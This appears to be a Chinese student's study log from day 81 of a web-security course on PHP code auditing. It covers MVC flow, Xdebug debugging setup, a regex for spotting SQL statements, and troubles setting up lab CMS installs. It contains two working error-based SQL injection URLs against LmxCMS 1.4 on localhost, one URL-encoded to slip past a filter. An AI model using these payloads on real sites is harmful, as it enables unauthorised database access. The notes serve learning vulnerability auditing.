网络安全学习81天(记录)

前言：

小迪安全，81天，开始了php代码审计

思路：

内容：

#知识点：
1、审计漏洞-SQL 数据库注入挖掘
1、审计思路-正则搜索&功能追踪&辅助工具
3、审计类型-常规架构&MVC 架构&三方框架
#章节点：
1、语言审计-PHP&.Net&Java&Python
2、漏洞审计-注入&上传&RCE&未授权等
3、框架审计-ThinkPHP&Spring&Flask 等
4、工具审计-RIPS&VCG&Fortify&Bandit 等
5、技术审计-动静态调试&DAST&SAST&IAST 等
#简要点：
1、代码审计必备知识点：
环境搭建使用，工具插件安装使用，掌握各种漏洞原理及利用,代码开发类知识点。
2、代码审计开始前准备：
审计目标的程序名，版本，当前环境(系统,中间件,脚本语言等信息),各种插件等。
3、代码审计挖掘漏洞根本：
可控变量及特定函数，不存在过滤或过滤不严谨存在绕过导致的安全漏洞。
4、代码审计教学计划：
审计项目漏洞原理->审计思路->完整源码->应用框架->验证并利用漏洞。
5、代码审计教学内容：
PHP,Java,.NET,Python 网站应用，引入框架类开发源码，相关审计工具及插件使
用。
#补充点：
-MVC 模型：见上图
当访问动态网页时，以 MVC 框架为例，浏览器提交查询到控制器（①），如是动态请求，
控制器将对应 sql 查询送到对应模型（②），由模型和数据库交互得到查询结果返回给控
制器（③），最后返回给浏览器（④）。
-动态调试配置：phpStudy + PhpStorm + XDebug
https://blog.csdn.net/nzjdsds/article/details/100114242
1、先确定 PHP 版本有 Xdebug
2、php.ini 配置写入并开启 Xdebug
3、PhpStorm 设置端口及 IDEY 并测试
4、PhpStorm 开启监听并运行断点访问

#数据库监控-QQ 业务源码系统-(无过滤)
数据库 SQL 监控排查可利用语句定向分析
#正则表达式-Bluecms 源码系统-(无过滤)
(update|select|insert|delete|).*?where.*=\
#CNVD 拿 1DAY-梦想 CMS 源码系统-(有过滤)
1、动态调试技术
2、文件对比技术
https://www.cnvd.org.cn/flaw/show/CNVD-2020-59466
梦想 CMS 后台 Bo***.cl***.php 文件存在 SQL 注入漏洞
http://localhost:8081/lmxcms1.4/admin.php?m=book&a=reply&id=1)%20
and%20updatexml(0,concat(0x7e,user()),1)%23
https://www.cnvd.org.cn/flaw/show/CNVD-2019-05674
LmxCMS V1.4 前台 Ta***.cl***.php 存在 SQL 注入漏洞
对比 1.4 与 1.41 文件代码不同更方便-Beyond Compare 4
http://localhost:8081/lmxcms1.4/?m=tags&name=%25%36%31%25%32%37%2
5%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%37%35%25%37%30%25%
36%34%25%36%31%25%37%34%25%36%35%25%37%38%25%36%64%25%36%63%25%32
%38%25%33%30%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%3
1%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%
25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25
%32%63%25%33%31%25%32%39%25%32%33

案例一
先做实验，没啥好讲的，做就完事了
刚想搭建qqswcms，我就用phpstudy搭建，但是他一直报错说数据库名错误，就奇怪了，我是用root数据库登的，你识别不到root数据库啊，但是我用mysql数据库登，我不知道密码啊，我没设密码啊，我咋知道密码是什么，关键是我在mysql数据库新建数据库，然后phpstudy就直接启动不了mysql数据库了，害我要删掉musql数据库，重新操作，寄，没啥说的

13日，不知不觉过了四天了，居然进度还没有到82天，离谱了

我的想法是既然sqqywcms搭建不了，那就换一个cms搭建，终于我找到了第二个，也就是bluecms，在我搭建中间，也就是我点了搭建，他居然没有任何反应，哎，我以为又和上一个一样，又失败了，就有点崩溃了，休息了一会，既然我自己不会，那就找教程吧，先我还想去看信息视频，一步一步做，想了一下，需要这么麻烦吗，网上有没有教程，然后我就去找，就一步一步做，还是一样的情况，但是我跟着教程做了，我在想安装失败了还能打开网站？我就试着打开网站，结果真能打开网站，回想了一下，那是安装成功了，但是为啥给我返回的是白色的界面，无语了、离谱，今天就先到这吧，明天看82天，进度给赶快了